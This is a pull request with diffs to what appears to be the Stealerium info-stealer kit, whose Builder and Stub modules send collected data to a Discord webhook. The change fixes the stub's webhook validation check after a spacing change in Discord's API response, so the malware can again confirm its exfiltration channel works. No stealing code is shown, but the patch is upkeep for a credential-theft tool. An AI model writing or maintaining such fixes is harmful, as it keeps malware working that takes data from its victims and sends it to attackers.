### PR TITLE
Fixed Invalid Webhook Issue

### DIFF
--- a/Builder/Modules/discord.cs
+++ b/Builder/Modules/discord.cs
@@ -16,7 +16,7 @@ internal sealed class Discord
         {
             var client = new HttpClient();
             var response = await client.GetStringAsync(token);
-            return response.StartsWith("{\"type\": 1");
+            return response.Contains("\"type\": 1");
         }
         catch
         {

--- a/Builder/Modules/discord.cs
+++ b/Builder/Modules/discord.cs
@@ -16,7 +16,7 @@ internal sealed class Discord
         {
             var client = new HttpClient();
             var response = await client.GetStringAsync(token);
-            return response.Contains("\"type\": 1");
+            return response.Contains("\"type\":1");
         }
         catch
         {

--- a/Stub/DiscordWebHook.cs
+++ b/Stub/DiscordWebHook.cs
@@ -56,7 +56,7 @@ namespace Stealerium
                 using (var client = new HttpClient())
                 {
                     var response = await client.GetStringAsync(Config.Webhook).ConfigureAwait(false);
-                    return response.StartsWith("{\"type\": 1");
+                    return response.Contains("\"type\": 1");
                 }
             }
             catch (Exception error)

--- a/Stub/DiscordWebHook.cs
+++ b/Stub/DiscordWebHook.cs
@@ -56,7 +56,7 @@ namespace Stealerium
                 using (var client = new HttpClient())
                 {
                     var response = await client.GetStringAsync(Config.Webhook).ConfigureAwait(false);
-                    return response.Contains("\"type\": 1");
+                    return response.Contains("\"type\":1");
                 }
             }
             catch (Exception error)


### PR DESCRIPTION
There is an extra space now in the string that is checked in the response from Discord. They have updated the discord API to contain "type:1" instead of "type: 1".